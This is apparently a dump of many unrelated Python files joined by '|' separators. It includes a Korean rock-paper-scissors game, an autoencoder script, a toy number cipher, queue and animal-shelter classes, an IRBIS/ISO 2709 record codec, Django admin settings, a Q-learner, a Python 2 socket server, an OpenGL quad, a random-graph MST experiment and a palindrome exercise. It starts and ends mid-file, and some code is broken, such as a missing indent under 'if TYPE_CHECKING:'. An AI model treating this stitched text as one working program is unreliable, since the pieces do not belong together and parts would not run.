    except:
        # Non-numeric input: warn and prompt again.
        print('숫자(가위 바위 보)로 입력해주세요.')
        continue
    if d == 0:
        # 0 ends the game.
        print('게임이 끝납니다')
        break
    if 3 < d or d < 1:
        # Out-of-range choice: warn and prompt again.
        print('잘못 입력하셧습니다.')
        continue
    # Show both hands, then decide the round.
    print ('제가 낸 것')
    display(a)
    print('당신이 낸 것 ')
    display(d)
    if a == d:
        print('비겻다')
    # Player wins: scissors<rock, rock<paper, paper<scissors (1<2, 2<3, 3<1).
    if (a == 1 and d == 2) or (a == 2 and d == 3) or (a == 3 and d == 1 ):
        print('당신이 이겻습니다')
    if (a == 2 and d == 1) or (a == 3 and d == 2) or (a == 1 and d == 3):
        print('제가 이겻습니다')
|
import os
import torch
import torchvision
from torch import nn
from torch.autograd import Variable
from torch.utils.data import DataLoader
from torchvision import transforms
from torchvision.utils import save_image
from torch.utils.data import TensorDataset
import numpy as np
from model import autoencoder
from pprint import pprint
from helpers import load, neighbors
# Load the vocabulary and its vectors (project-specific helper).
(words, vectors) = load()
# Rebuild the autoencoder architecture and restore the trained weights.
model = autoencoder()
model.load_state_dict(torch.load('./model.pth'))
# Push every vector through the encoder half only, collecting the
# compressed numpy representations.
compressed = []
for vec in vectors:
    # NOTE(review): Variable is a no-op in modern torch (>=0.4); `vec`
    # alone would suffice — confirm the targeted torch version.
    X = Variable(vec)
    output = model.encoder(X)
    compressed.append(output.data.numpy())
# Report nearest neighbours in the compressed space (project helper).
neighbors(words, compressed)
# Multiplier used for the toy "encryption" step below.
# NOTE(review): deliberately truncated to 3.14; math.pi would make the
# decode division below less lossy — confirm intent.
pi = 3.14
# Build the lowercase Latin alphabet a..z from ASCII codes 97..122.
alphabet = []
for letter in range(97,123):
    alphabet.append(chr(letter))
# Read the text ("Metin" is Turkish for "text"), lowercase it, drop spaces.
data = input("Metin: ").lower().replace(" ", "")
# Split the input into single characters.
words=[]
for word in range(len(data)):
    words.append(data[word])
# Map every letter to its 1-based position in the alphabet;
# non-letter characters are silently dropped.
message = []
for i in words:
    for j in alphabet:
        if(i == j):
            msg = alphabet.index(i) + 1
            message.append(msg)
# Concatenate the positions into one number and "encrypt" by multiplying by pi.
# NOTE(review): the concatenation is ambiguous (1,2 vs 12) and the float
# multiply/divide round-trip loses precision for long inputs — the printed
# "decode" is not guaranteed to equal the original integer.
enc_msg = (''.join(map(str, message)))
com_msg = int(enc_msg) * pi
print(" encode ")
print(com_msg)
print(" decode ")
print(com_msg / pi)
|
class Node:
    """A singly linked node holding one queue value."""

    def __init__(self, value):
        self.value = value
        self.next = None


class Queue:
    """FIFO queue backed by a singly linked list of Node objects."""

    def __init__(self):
        self.front = None  # next node to dequeue
        self.rear = None   # most recently enqueued node

    def enqueue(self, value):
        """Append *value* at the rear of the queue."""
        node = Node(value)
        if not self.rear:
            self.front = node
            self.rear = node
        else:
            self.rear.next = node
            self.rear = node

    def dequeue(self):
        """Detach and return the front node, or an error string when empty.

        The bare ``except`` of the original is replaced with an explicit
        emptiness check; the (historically misnamed) message is preserved
        for backward compatibility.
        """
        if self.front is None:
            return 'this is an empty Stack'
        temp = self.front
        self.front = temp.next
        if self.front is None:
            # BUG FIX: the original left `rear` pointing at the removed
            # node when the queue drained, so the next enqueue built an
            # unreachable chain (front stayed None).
            self.rear = None
        temp.next = None
        return temp

    def peek(self):
        """Return the front value without removing it, or an error string when empty."""
        if self.front is None:
            return 'this is an empty Stack'
        return self.front.value

    def is_empty(self):
        """Return True when the queue holds no elements."""
        return self.front is None
# **************************************************************************************************
class Animal:
    """A shelter entry: the animal's name, its kind, and the link to the
    next animal in arrival order."""

    def __init__(self, name, kind):
        self.name = name
        self.kind = kind
        self.next = None


class AnimalShelter():
    """FIFO shelter that adopts out the oldest animal of a preferred kind
    ('cat' or 'dog')."""

    def __init__(self):
        self.front = None  # oldest animal
        self.rear = None   # newest animal

    def Animal_enqueue(self, name, kind):
        """Add an animal to the shelter; only 'cat' and 'dog' are accepted."""
        animal = Animal(name, kind)
        if animal.kind == 'dog' or animal.kind == 'cat':
            if not self.rear:
                self.rear = animal
                self.front = animal
            else:
                self.rear.next = animal
                self.rear = animal
            return 'Successfully added the animal'
        return 'your input should only be a cat or a dog'

    # (Original author's note: the predecessor-tracking approach below was
    # adapted from an online hint — temp/temp.next stands in for `previous`.)
    def Animal_dequeue(self, pref):
        """Remove and return the name of the oldest animal of kind *pref*.

        Returns None when the shelter is empty, *pref* is not 'cat'/'dog',
        or no animal of that kind is present.
        """
        if not self.rear:
            return None
        if pref != 'dog' and pref != 'cat':
            return None
        temp = self.front
        if self.front.kind == pref:
            # Match at the front: plain dequeue.
            self.front = self.front.next
            temp.next = None
            if not self.front:
                self.rear = None
            return temp.name
        # Match somewhere after the front: unlink temp.next.
        while temp.next:
            if temp.next.kind == pref:
                removed = temp.next
                temp.next = removed.next
                if removed is self.rear:
                    # BUG FIX: the original never re-pointed `rear` when the
                    # removed animal was the rear, so later enqueues were
                    # attached to the detached node and silently lost.
                    self.rear = temp
                removed.next = None
                return removed.name
            temp = temp.next
        return None
if __name__ == "__main__":
    # Demo run: interleave enqueues with preference-based dequeues,
    # including dequeues from an emptied shelter (expected to print None).
    animals = AnimalShelter()
    animals.Animal_enqueue('sugar','cat')
    animals.Animal_enqueue('shawerma','dog')
    animals.Animal_enqueue('caramel','cat')
    animals.Animal_enqueue('banana','dog')
    print(animals.Animal_dequeue("cat"))
    print(animals.Animal_dequeue("dog"))
    print(animals.Animal_dequeue("dog"))
    print(animals.Animal_dequeue("cat"))
    print(animals.front)
    print(animals.rear)
    print(animals.Animal_dequeue("dog"))
    # Visual separator in the console output.
    print(5555555555555555555)
    animals.Animal_enqueue('argon','dog')
    animals.Animal_enqueue('biter','cat')
    print(animals.Animal_dequeue("cat"))
    print(animals.Animal_dequeue("dog"))
    print(animals.Animal_dequeue("cat"))
    print(animals.Animal_dequeue("dog"))
import re
from collections import defaultdict
# One truth-file row: tax_id <TAB> absolute abundance <TAB> optional
# relative abundance <TAB> rank <TAB> taxon name.
REGEX_TRUTH_FILE_ENTRY = r"(?P<tax_id>\d+)\t(?P<abs_abundance>\d+(?:\.\d*)?)\t(?P<rel_abundance>0\.\d+)?\t(?P<rank>[a-zA-Z]+)\t(?P<tax_name>.+)(?:\n|$)"


def parse_truth_file(truth_file):
    """Parse a TSV truth file, yielding one dict per well-formed line.

    Arguments:
        truth_file {iterable of str} -- Open truth file (or any iterable
        of lines) in the format described by REGEX_TRUTH_FILE_ENTRY.

    Yields:
        dict -- keys 'tax_id' (int), 'rank' (str), 'abs_abundance' (int),
        'tax_name' (str).
    """
    # Note: we ignore the relative abundances because it might have rounding errors
    # (e.g. there were entries like 0.000000)
    for line in truth_file:
        matches = re.match(REGEX_TRUTH_FILE_ENTRY, line)
        if matches is None:
            # BUG FIX: blank, header, or malformed lines previously raised
            # AttributeError on matches.group(); skip them instead.
            continue
        yield {
            'tax_id': int(matches.group('tax_id')),
            'rank': matches.group('rank'),
            'abs_abundance': int(float(matches.group('abs_abundance'))),
            'tax_name': matches.group('tax_name')
        }
def extract_truth(truth_files):
    """Aggregate entries from several truth files, grouped by rank.

    Arguments:
        truth_files {iterable} -- Open truth-file objects.

    Returns:
        defaultdict -- maps rank name to the list of entry dicts produced
        by parse_truth_file.
    """
    # defaultdict(list) is the idiomatic spelling of defaultdict(lambda: []).
    truth_taxa = defaultdict(list)
    for truth_file in truth_files:
        for entry in parse_truth_file(truth_file):
            truth_taxa[entry['rank']].append(entry)
    return truth_taxa
|
# coding: utf-8
"""
Reading and writing plain text files in IRBIS format.
"""
# pylint: disable=too-many-locals
# pylint: disable=too-many-statements
from typing import TYPE_CHECKING
from irbis._common import ANSI, STOP_MARKER, safe_str
from irbis.error import IrbisError
from irbis.records import SubField, Field, Record
if TYPE_CHECKING:
from typing import Iterable, Optional, List
def read_text_record(stream) -> 'Optional[Record]':
    """
    Read one record from a file in the IRBIS plain-text interchange format.

    :param stream: Text file (or file-like object) to read from
    :return: The record, or None when no fields could be read
    """
    result = Record()
    while True:
        line: str = stream.readline()
        if not line:
            # End of file.
            break
        line = line.strip()
        if line.startswith(STOP_MARKER):
            # End-of-record marker.
            break
        if not line.startswith('#'):
            # Every field line must start with '#'.
            break
        parts = line[1:].split(':', 1)
        if len(parts) != 2:
            break
        tag = int(parts[0])
        # Drop the single space that follows the colon (the writer emits
        # '#tag: value').
        text = parts[1][1:]
        field = Field(tag)
        field.parse(text)
        result.fields.append(field)
    if not result.fields:  # A record without fields means "no record": return None
        return None
    return result
def write_text_record(stream, record: Record) -> None:
    """
    Write a record to a file in the IRBIS plain-text interchange format.

    :param stream: Writable text stream.
    :param record: Bibliographic record.
    :return: None
    """
    assert stream
    assert record
    for field in record.fields:
        parts = ['#' + str(field.tag) + ': ' + safe_str(field.value)]
        for subfield in field.subfields:
            # NOTE: extend() iterates the subfield's string character by
            # character; the ''.join() below makes this equivalent to
            # appending the whole string.
            parts.extend(str(subfield))
        line = ''.join(parts) + '\n'
        stream.write(line)
    stream.write(STOP_MARKER + '\n')
###############################################################################
# Length of the ISO 2709 record marker (leader), in bytes
MARKER_LENGTH = 24
# Record delimiter (ASCII GS)
RECORD_DELIMITER = 0x1D
# Field delimiter (ASCII RS)
FIELD_DELIMITER = 0x1E
# Subfield delimiter (ASCII US)
SUBFIELD_DELIMITER = 0x1F
def parse_int(buffer: 'Iterable'):
    """
    Parse a sequence of ASCII digit bytes as a decimal integer.

    :param buffer: Iterable of byte values (each an ASCII digit)
    :return: The decoded integer (0 for an empty buffer)
    """
    value = 0
    for digit_byte in buffer:
        value = value * 10 + (digit_byte - ord('0'))
    return value
def encode_int(buffer: bytearray, position: int,
               length: int, value: int) -> None:
    """
    Write *value* into *buffer* as a zero-padded decimal of *length* digits.

    The least significant digit lands at ``position + length - 1``.

    :param buffer: Buffer to fill
    :param position: Start position of the digit chunk
    :param length: Number of digit characters to write
    :param value: Non-negative value to encode
    :return: None
    """
    for offset in range(length - 1, -1, -1):
        buffer[position + offset] = value % 10 + ord('0')
        value //= 10
def encode_str(buffer: bytearray, position: int,
               value: 'Optional[str]', encoding: str) -> int:
    """
    Encode a string into *buffer* starting at *position*.

    :param buffer: Buffer to fill
    :param position: Start position
    :param value: Value to encode (None or empty writes nothing)
    :param encoding: Encoding to use
    :return: Position just past the last byte written
    """
    if not value:
        return position
    encoded = value.encode(encoding)
    buffer[position:position + len(encoded)] = encoded
    return position + len(encoded)
def read_iso_record(stream, charset: str = ANSI) -> 'Optional[Record]':
    """
    Read one record from a file in ISO 2709 format.

    :param stream: Binary file or file-like object
    :param charset: Encoding of the record's text
    :return: Decoded record, or None at end of file / on corrupt data
    """
    # Read the record length first...
    marker = stream.read(5)
    if len(marker) != 5:
        return None
    # ...and then the rest of the record
    record_length = parse_int(marker)
    need = record_length - 5
    tail = stream.read(need)
    if len(tail) != need:
        return None
    # Quick sanity check that this is a well-formed ISO record
    record = marker + tail
    if record[record_length - 1] != RECORD_DELIMITER:
        return None
    # Pull layout parameters from the leader
    indicator_length = parse_int(record[10:11])
    base_address = parse_int(record[12:17])
    # Start the actual conversion
    result = Record()
    # Walk the fields via the directory
    directory = MARKER_LENGTH
    while record[directory] != FIELD_DELIMITER:
        # a field delimiter here means the directory is over
        tag = parse_int(record[directory:directory + 3])
        field_length = parse_int(record[directory + 3:directory + 7])
        field_offset = parse_int(record[directory + 7:directory + 12]) + \
            base_address
        field = Field(tag)
        result.fields.append(field)
        if tag < 10:
            # fixed-length field:
            # cannot contain subfields or indicators
            field.value = record[field_offset:field_offset +
                                 field_length - 1].decode(charset)
        else:
            # variable-length field:
            # carries two one-byte indicators and may contain subfields
            start = field_offset + indicator_length
            stop = field_offset + field_length - indicator_length + 1
            position = start
            # scan for the field value up to the first subfield delimiter
            while position < stop:
                # BUG FIX: the original tested record[start] here, so the
                # scan never advanced past a leading value and swallowed
                # the subfield delimiters into field.value.
                if record[position] == SUBFIELD_DELIMITER:
                    break
                position += 1
            # remember any text found before the first delimiter
            if position != start:
                field.value = record[start:position].decode(charset)
            # now walk the subfields
            start = position
            while start < stop:
                position = start + 1
                while position < stop:
                    if record[position] == SUBFIELD_DELIMITER:
                        break
                    position += 1
                subfield = SubField(chr(record[start + 1]),
                                    record[start + 2:position].decode(charset))
                field.subfields.append(subfield)
                start = position
        # move on to the next directory entry
        directory += 12
    return result
def write_iso_record(stream, record: Record, encoding: str) -> None:
    """
    Write a record to a file in ISO 2709 format.

    :param stream: Binary output stream
    :param record: Record to encode
    :param encoding: Target encoding
    :return: None
    """
    record_length = MARKER_LENGTH
    dictionary_length = 1  # including the directory terminator
    field_length: 'List[int]' = []
    # First pass: compute the total record length
    for field in record.fields:
        if field.tag <= 0 or field.tag >= 1000:
            # The field tag cannot be encoded in three digits
            raise Exception
        dictionary_length += 12  # one directory entry
        this_field_length = 0
        if field.tag < 10:
            # A fixed-length field has no subfields or indicators
            val = field.value
            if val:
                this_field_length += len(val.encode(encoding))
        else:
            this_field_length += 2  # the two indicators
            if field.value:
                this_field_length += len(field.value.encode(encoding))
            for subfield in field.subfields:
                code = subfield.code
                if code is None or ord(code) <= 32 or ord(code) >= 255:
                    raise IrbisError('Bad code: ' + safe_str(code))
                this_field_length += 2  # subfield marker and its code
                val = subfield.value
                if val:
                    this_field_length += len(val.encode(encoding))
        this_field_length += 1  # field delimiter
        if this_field_length >= 10_000:
            # The field is too long
            raise Exception
        field_length.append(this_field_length)
        record_length += this_field_length
    record_length += dictionary_length  # the directory
    record_length += 1  # record delimiter
    if record_length >= 100_000:
        # The record is too long
        raise Exception
    # Second pass: the actual encoding
    dictionary_position = MARKER_LENGTH
    base_address = MARKER_LENGTH + dictionary_length
    current_address = base_address
    buffer = bytearray(record_length)
    for i in range(base_address):
        buffer[i] = 32  # fill leader and directory with spaces
    encode_int(buffer, 0, 5, record_length)
    encode_int(buffer, 12, 5, base_address)
    buffer[5] = ord('n')   # Record status
    buffer[6] = ord('a')   # Record type
    buffer[7] = ord('m')   # Bibliographical index
    buffer[8] = ord('2')
    buffer[10] = ord('2')
    buffer[11] = ord('2')
    buffer[17] = ord(' ')  # Bibliographical level
    buffer[18] = ord('i')  # Cataloging rules
    buffer[19] = ord(' ')  # Related record
    buffer[20] = ord('4')  # Field length
    buffer[21] = ord('5')  # Field offset
    buffer[22] = ord('0')
    # Encode the directory terminator
    buffer[base_address - 1] = FIELD_DELIMITER
    # Walk the fields
    for i, field in enumerate(record.fields):
        # Encode the directory entry
        encode_int(buffer, dictionary_position + 0, 3,
                   field.tag)
        encode_int(buffer, dictionary_position + 3, 4,
                   field_length[i])
        encode_int(buffer, dictionary_position + 7, 5,
                   current_address - base_address)
        # Encode the field itself
        if field.tag < 10:
            # A fixed-length field has no subfields or indicators.
            # BUG FIX: the original discarded encode_str()'s return value,
            # so current_address never advanced past the field text and the
            # delimiter below overwrote the field's first byte.
            current_address = encode_str(buffer, current_address,
                                         field.value, encoding)
        else:
            # Two indicators
            buffer[current_address + 0] = 32
            buffer[current_address + 1] = 32
            current_address += 2
            # Field value up to the first delimiter
            current_address = encode_str(buffer, current_address,
                                         field.value, encoding)
            # Subfields
            for subfield in field.subfields:
                buffer[current_address + 0] = SUBFIELD_DELIMITER
                buffer[current_address + 1] = ord(subfield.code)
                current_address += 2
                current_address = encode_str(buffer, current_address,
                                             subfield.value, encoding)
        buffer[current_address] = FIELD_DELIMITER
        current_address += 1
        dictionary_position += 12
    # Record terminator
    buffer[record_length - 2] = FIELD_DELIMITER
    buffer[record_length - 1] = RECORD_DELIMITER
    # Finally, write it all out
    stream.write(buffer)
###############################################################################
# Public API of this module.
__all__ = ['read_text_record', 'read_iso_record', 'STOP_MARKER',
           'write_text_record', 'write_iso_record']
|
from django.conf import settings
from django.db import models
from django.contrib.auth.models import User
from models import Video, Note, UserProfile, Source
from django.contrib import admin
class CommonAdmin(admin.ModelAdmin):
    """Shared admin defaults: action bars at top and bottom, a save button
    on top, filtering by the ``published`` flag, and TinyMCE editor assets.
    """
    save_on_top = True
    actions_on_top = True
    actions_on_bottom = True
    list_filter = ('published',)

    class Media:
        # Load TinyMCE itself plus the project-specific editor setup script.
        js = (
            settings.STATIC_URL + 'grappelli/tinymce/jscripts/tiny_mce/tiny_mce.js',
            settings.STATIC_URL + 'js/tinymce_setup.js',
        )
class VideoAdmin(CommonAdmin):
    """Admin configuration for Video objects."""
    fieldsets = (
        ('The Basics', {
            'fields': ('title', 'type', 'teaser', 'description', 'user',
                       'published', 'tags', 'slug',),
        }),
        ('The Details', {
            'fields': ('video_url', 'video_file', 'time', 'end_time',
                       'video_length', 'user_name', 'user_link', 'icon',
                       'icon_link', 'private', 'lock_notes',),
        }),
    )
    readonly_fields = ('slug',)
    list_display = ('title', 'video_url', 'published', 'type', 'private', 'user',)
    list_display_links = ('title',)
    # 'published' is editable directly from the change list.
    list_editable = ('published',)
class SourceAdmin(CommonAdmin):
    """Admin configuration for note Sources (Twitter/CSV/SRT imports)."""
    fieldsets = (
        ('The Basics', {
            'fields': ('name', 'user', 'video', 'url', 'type', 'scraped',
                       'content',),
        }),
        ('Twitter Specific', {
            'fields': ('twitter_user', 'twitter_hash', 'twitter_start_id',
                       'twitter_end_id', 'twitter_search',),
        }),
        ('CSV Specific', {
            'fields': ('csv_data',),
        }),
        ('SRT Specific', {
            'fields': ('srt_data',),
        }),
        ('Oops', {
            'fields': ('error_message',),
        }),
    )
    # Imported payloads are shown but never hand-edited.
    readonly_fields = ('csv_data', 'srt_data',)
    list_display = ('name', 'url', 'video', 'creation_time', 'type')
    list_display_links = ('name', 'url', 'video', 'creation_time', 'type',)
class NoteAdmin(CommonAdmin):
    """Admin configuration for Note objects."""
    fieldsets = (
        ('The Basics', {
            'fields': ('text', 'user', 'video', 'published', 'tags',
                       'private',),
        }),
        ('The Details', {
            'fields': ('time', 'end_time', 'offset', 'end_offset',
                       'user_name', 'user_link', 'link', 'icon_link', 'icon',
                       'type', 'source', 'source_link', 'original_source',
                       'original_source_link', 'import_source',
                       'import_source_name',),
        }),
    )
    readonly_fields = ('import_source_name',)
    search_fields = ('text',)
    list_display = ('text', 'video', 'offset', 'published',)
    list_display_links = ('text',)
    # 'published' is editable directly from the change list.
    list_editable = ('published',)
    list_filter = ('published', 'private', 'video', 'user', 'import_source', 'type',)
class UserProfileAdmin(admin.ModelAdmin):
    """Admin configuration for UserProfile objects (plain ModelAdmin --
    deliberately not a CommonAdmin, since profiles have no 'published' flag).
    """
    fieldsets = (
        ('The Basics', {
            'fields': ('user', 'role', 'can_note', 'accepted_eula', ),
        }),
    )
    list_display = ('user', 'role', 'can_note',)
    list_display_links = ('user',)
    # 'can_note' is toggled directly from the change list.
    list_editable = ('can_note',)
#admin.site.unregister(User)
#
#class UserProfileInline(admin.TabularInline):
# model = UserProfile
#
#class UserAdmin(admin.ModelAdmin):
# inlines = [UserProfileInline]
#
#admin.site.register(User, UserAdmin)
#select setval('contracts_id_seq', (select max(id) + 1 from contracts));
# Wire each model to its admin class on the default admin site.
admin.site.register(Video, VideoAdmin)
admin.site.register(Note, NoteAdmin)
admin.site.register(Source, SourceAdmin)
admin.site.register(UserProfile, UserProfileAdmin)
from cars import Cars
def load_cars():
    """Build the demo fleet.

    Returns a list of ``Cars`` instances: three categories (compact,
    premium, minivan) with four cars each, ids 100-111, all "model1",
    mileages 1000/2000/3000/4000 within each category -- same contents
    and order as the original three copy-pasted dict + loop pairs.
    """
    cars = []
    next_id = 100
    for category in ("compact", "premium", "minivan"):
        for mileage in (1000, 2000, 3000, 4000):
            # ids are assigned sequentially across categories (100..111).
            cars.append(Cars(next_id, category, "model1", mileage))
            next_id += 1
    return cars
"""
Template for implementing QLearner (c) 2015 Tucker Balch
"""
import numpy as np
import random as rand
class QLearner(object):
    """Tabular Q-learner with an epsilon-greedy policy.

    Q-values are stored lazily per state in ``self.Q`` (state -> numpy
    array of action values).  The random-action rate ``rar`` decays
    multiplicatively by ``radr`` every time an action choice is made.
    """

    def __init__(self,
                 num_states=100,
                 num_actions=4,
                 alpha=0.3,
                 gamma=0.9,
                 rar=0.9999999999,
                 radr=0.999999,
                 verbose=False):
        """
        @param num_states: number of discrete states (informational only)
        @param num_actions: number of discrete actions
        @param alpha: learning rate in [0, 1]
        @param gamma: discount factor (currently unused -- see _newQValue)
        @param rar: initial random-action probability
        @param radr: multiplicative decay applied to rar per decision
        @param verbose: enable debug output (unused in this class)
        """
        self.verbose = verbose
        self.num_actions = num_actions
        self.num_states = num_states
        self.alpha = alpha
        self.gamma = gamma
        self.rar = rar
        self.radr = radr
        # State -> np.array of per-action values, created on first reward().
        self.Q = {}

    def querystate(self, s):
        """
        @summary: Update the state without updating the Q-table
        @param s: The new state
        @returns: The selected action
        """
        if s not in self.Q or self._shouldTakeRandomAction():
            a = rand.randint(0, self.num_actions - 1)
        else:
            a = self._bestAction(actions=self.Q[s])
        return a

    def query(self, s):
        """Greedy action for state s; a random action if s is unseen."""
        if s not in self.Q:
            # print(...) with parentheses prints identically on Python 2 and
            # is valid Python 3 (the original bare `print` was 2-only).
            print("Have Not Seen State")
            a = rand.randint(0, self.num_actions - 1)
        else:
            a = self._bestAction(actions=self.Q[s])
        return a

    def _shouldTakeRandomAction(self):
        """Decay rar and draw 1 (take random action) with probability rar."""
        self.rar = self.rar * self.radr
        choice = np.random.choice(2, p=[1 - self.rar, self.rar])
        return choice

    def _bestAction(self, actions):
        """Index of the highest-valued action (first index on ties)."""
        # np.argmax returns the first maximum, matching the original
        # hand-rolled loop's strict-greater tie-breaking.
        return int(np.argmax(actions))

    def reward(self, s, a, r):
        """Apply reward r for having taken action a in state s."""
        if s not in self.Q:
            self.Q[s] = np.zeros(self.num_actions)
        self.Q[s][a] = self._newQValue(s, a, r)

    def _newQValue(self, s, a, r):
        # NOTE(review): classic Q-learning also adds gamma * max(Q[s']);
        # the next state s' is not passed into reward(), so self.gamma is
        # unused here.  Fixing this would require an interface change.
        old_value = (1 - self.alpha) * self.Q[s][a]
        new_value = self.alpha * r
        return old_value + new_value

    def author(self):
        return "nlerner3"
|
# -*- coding: utf-8 -*-
import socket
import sys
from thread import *
import newPackage
import re
reload(sys)
sys.setdefaultencoding('utf-8')
HOST = '' # Symbolic name meaning all available interfaces
PORT = 8080 # Port Specified
#Function for handling connections. This will be used to create threads
def clientthread(conn, myPacks):
    """Serve one client connection until it dies (Python 2 code).

    Protocol: each message is ``CMD|pkg|deps``; CMD is one of INDEX,
    REMOVE, QUERY, PRINT.  The handler's return value (or ``ERROR\\n``)
    is sent back verbatim.  ``myPacks`` is the shared PackageList; its
    methods are assumed to be safe for concurrent use -- TODO confirm.
    """
    #infinite loop so that function do not terminate and thread do not end.
    while True:
        #Receiving from client
        try:
            # NOTE(review): .encode('utf-8') on a byte string is a Python 2
            # idiom; non-ASCII input raises here and drops the connection.
            data = conn.recv(4096).encode('utf-8')
        except:
            print "Don't handle non utf-8 chars\n"
            break
        cmds = data.split("|")
        # Malformed message (not exactly CMD|pkg|deps): reply ERROR, keep going.
        if len(cmds) != 3:
            try:
                conn.sendall("ERROR\n")
            except:
                print "Dead connection"
                break
            continue
        cmd = cmds[0].strip()
        pkg = cmds[1].strip()
        deps = cmds[2].strip()
        if cmd == "INDEX":
            # Package names are restricted to dot/plus/alnum/underscore/dash.
            if not bool(re.match('^[.+a-z0-9_-]+$', pkg, re.IGNORECASE)):
                reply = "ERROR\n"
                try:
                    conn.sendall(reply)
                except:
                    print "Dead connection"
                    break
                print data
                continue
            ret = myPacks.index(pkg, deps)
            reply = ret
        elif cmd == "REMOVE":
            ret = myPacks.remove(pkg)
            reply = ret
        elif cmd == "QUERY":
            ret = myPacks.query(pkg)
            reply = ret
        elif cmd == "PRINT":
            # Debug command: dumps the package list server-side.
            myPacks.printPackage()
            reply = "OK\n"
        else:
            reply = "ERROR\n"
        #Now send the response back
        try:
            conn.sendall(reply)
        except:
            print "Dead connection"
            break
    #came out of loop
    conn.close()
# Script entry point: bind a TCP server and hand each accepted connection
# to a clientthread (Python 2 `thread` module).
if __name__=='__main__':
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    print 'Socket created'
    #Bind socket to local host and port
    try:
        s.bind((HOST, PORT))
    except socket.error as msg:
        print 'Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
        sys.exit()
    print 'Socket bind complete'
    # Shared package list handed to every client thread.
    myPacks = newPackage.PackageList()
    #Start listening on socket
    s.listen(150)
    print 'Socket now listening'
    #now keep talking with the client
    while 1:
        #wait to accept a connection - blocking call
        conn, addr = s.accept()
        print 'Connected with ' + addr[0] + ':' + str(addr[1])
        #start new thread takes 1st argument as a function name to be run, second is the tuple of arguments to the function.
        start_new_thread(clientthread ,(conn,myPacks,))
    # NOTE(review): unreachable -- the accept loop above never exits.
    s.close()
|
from OpenGL.GL import *
from OpenGL.GLU import *
import transformations as tr
from drawable import Drawable
class Plane( Drawable ) :
    """A flat quad lying in the local XZ plane, drawn with a model matrix.

    size -- (width, depth) pair; stored internally as half-extents.
    m    -- 4x4 model matrix, multiplied (transposed) onto MODELVIEW.
    """
    def __init__( self , size , m ) :
        Drawable.__init__( self )
        # BUGFIX: the original used map(lambda x: x*.5, size).  On Python 3
        # map() returns a lazy iterator which is not subscriptable, so
        # self.size[0] in _quad() would raise TypeError.  A list
        # comprehension is identical on Python 2 and correct on Python 3.
        self.size = [ x * .5 for x in size ]
        self.m = m

    def draw( self ) :
        glMatrixMode(GL_MODELVIEW)
        glPushMatrix()
        # Row-major matrix, hence the transpose variant.
        glMultTransposeMatrixf(self.m)
        self._quad()
        glPopMatrix()

    def _quad( self ) :
        # Counter-clockwise quad with a +Y normal.
        glBegin( GL_QUADS )
        glNormal3f(0,1,0)
        glVertex3f(-self.size[0],0,-self.size[1])
        glVertex3f( self.size[0],0,-self.size[1])
        glVertex3f( self.size[0],0, self.size[1])
        glVertex3f(-self.size[0],0, self.size[1])
        glEnd()
|
'''
UniformlyRandomEdgeMST.py
Created on Feb 18, 2013
@author: adrielklein
This program will use Prim's algorithm to find the weight of a minimum spanning tree of a complete graph
with n vertices, where the weight of each edge is a real number chosen uniformly at random from [0, 1].
'''
from random import uniform #Required to find uniform value in range(0,1)
from HeapOperations import extractMin, changeKey, heapifyUp, heapifyDown
from heapq import heapify
# Creates and an adjacency matrix of n nodes with undirected edges.
# The adjacency matrix has (1/2)n^2 entries to conserve memory. Note that
# this is only possible since edges are undirected. The edge weights are
# chosen uniformly at random in interval (0, 1). The i-th row of the matrix
# represents the edge weight from node i to other nodes in the graph.
def createAdjacencyMatrix(n):
    """Return a lower-triangular adjacency "matrix" for a complete graph.

    Row i holds i edge weights, each drawn uniformly at random from
    (0, 1), to nodes 0..i-1, followed by a 0.0 self-loop entry.  Only the
    lower half is stored because edges are undirected, halving memory.
    """
    return [[uniform(0, 1) for _ in range(row)] + [0.0]
            for row in range(n)]
def minimumSpanningTreeWeight(n):
    """Return the MST weight of a random complete graph on n nodes.

    Prim's algorithm over a binary heap of (attachment-cost, node) pairs;
    ``heapMap`` tracks each node's current index inside the heap so keys
    can be decreased in place via changeKey().
    """
    adjacencyMatrix = createAdjacencyMatrix(n)
    # Node 0 will be the root node.
    distancesFromRoot = [adjacencyMatrix[i][0] for i in range(n)] #First column of matrix
    # Create heap where key is attachmentCost and value is the node.
    attachmentCosts = [(distancesFromRoot[i], i) for i in range(n)]
    heapify(attachmentCosts)
    #Create heapMap that maps each node to its position in heap
    heapMap = [None]*n
    #Populate heapMap
    for i in range(n):
        node = attachmentCosts[i][1]
        heapMap[node] = i
    treeWeight = 0
    while len(attachmentCosts) != 0:
        pair = extractMin(attachmentCosts, heapMap)
        cost = pair[0]
        newTreeMember = pair[1]
        treeWeight += cost
        # Change the keys of all the nodes in the heap that have a new attachment cost
        for i in range(n):
            # NOTE(review): assumes extractMin marks removed nodes with -1
            # in heapMap -- confirm against HeapOperations.
            if heapMap[i] != -1:
                # Only the lower triangle is stored, so order the indices.
                if newTreeMember >= i:
                    possiblySmallerCost = adjacencyMatrix[newTreeMember][i]
                else:
                    possiblySmallerCost = adjacencyMatrix[i][newTreeMember]
                if possiblySmallerCost < attachmentCosts[heapMap[i]][0]:
                    changeKey(attachmentCosts, heapMap, i, possiblySmallerCost)
    return treeWeight
# Python 2 script driver: for each graph size 2^4 .. 2^13, average the MST
# weight over 5 independent random graphs and print one line per size.
print "Nodes: MST Weight"
#The following loop runs the algorithm for various input lengths and prints the results.
for x in range(4, 14):
    weights = [minimumSpanningTreeWeight(2**x) for i in range(5)]
    print str(2**x) + ": " + str(sum(weights) / len(weights))
"""
Librusec library settings
"""
# -*- coding: utf-8 -*-
# Raw strings below are byte-identical to the original backslash-escaped
# Windows paths.
LIB_INDEXES = r'D:\TEMP\librusec'   # directory holding the library indexes
LIB_ARCHIVE = r'D:\lib.rus.ec'      # root of the book archive
TMP_DIR = r'd:\temp'                # scratch directory
|
# Read a list of ints; keep values <= 10, replace every other value with the
# next palindrome strictly greater than it.
print("Enter the number of the list one by one\n")  # (typo "lsit" fixed)
# Take the size of list from the user
size = int(input("Enter size of list\n"))
# Initialize the blank list
mylist = []
# Take the input from the user one by one
for i in range(size):
    mylist.append(int(input(f"Enter {i+1} list element\n")))
# mylist = [7, 3, 2, 1]
print(f"Your list is {mylist}\n")
new_list = []
for value in mylist:
    if value <= 10:
        new_list.append(value)
    else:
        # BUGFIX: the original recomputed `n = mylist[i] + 1` on every pass
        # of a `while True` loop, so the candidate never advanced and the
        # loop hung forever unless value + 1 was already a palindrome.
        n = value + 1
        while str(n) != str(n)[::-1]:
            n += 1
        new_list.append(n)
print(f"Your New list is {new_list}\n")
|
import argparse
